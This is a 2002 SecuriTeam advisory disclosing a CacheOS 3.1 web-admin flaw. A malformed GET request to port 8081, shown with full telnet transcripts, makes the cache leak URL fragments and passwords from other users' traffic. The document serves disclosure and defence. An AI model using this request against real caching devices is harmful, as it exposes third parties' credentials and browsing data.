[UNIX] Web Administration Vulnerability in CacheOS

From: support@securiteam.com
Date: 01/09/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Wed,  9 Jan 2002 21:32:31 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Web Administration Vulnerability in CacheOS
------------------------------------------------------------------------

SUMMARY

 <http://www.cacheflow.com/> CacheOS is a product used by web caching
devices made by CacheFlow, which is actually an Intel based box with a
RAID array and a custom OS. The CacheFlow has a web-admin interface open
at port 8081 by default. By sending a certain request, malicious attackers
can view parts of web pages and URL's transferred through the cache at the
time. Examples of data that may be gathered using this method are,
usernames/passwords, form contents, URL's etc.

DETAILS

Vulnerable systems:
CacheOS version 3.1

Example:
Telnet or use nc to connect to port 8081, then issue the following
command:

GET /Secure/Local/console/cmhome.htm

Now legally in HTTP you should also supply something like HTTP/1.0 at the
end of that string, if you do that then the cache replies that the station
is not authorized to view page. If you omit HTTP/1.0 like as shown above,
most times the cache just issues this:

localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm

HTTP/1.0 200 OK

Request cannot be honored
Connection closed by foreign host

However, if you try multiple times it will sometime return something like
this:
localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm

HTTP/1.0 404-Not Found

<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The
request
ed URL "/Secure/Local/console/cmhome.htm

Easp&o=0&sv=za5cb0d78&qid= E2BCA8F417ECE94DBDD27B75F951FFDA&uid=
2c234acbec234acbe&sid=3c234acbec234acbe&ord=1" was not found on this
server.<P></BODY>Connection closed by foreign host.

As you can see, the chunk of code it blurted out in the 404 page contained
part of an URL that a client on the cache was visiting at the time. We
have also been able to read passwords from URL's using this technique.

Vendor status:
support@cacheflow.com were contacted on 10/31/2001 and quick replied
asking for more information, however no information on patches or fixes
was ever supplied.

ADDITIONAL INFORMATION

The information has been provided by <mailto:bugtraq@svindel.net> Bjorn
Djupvik.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages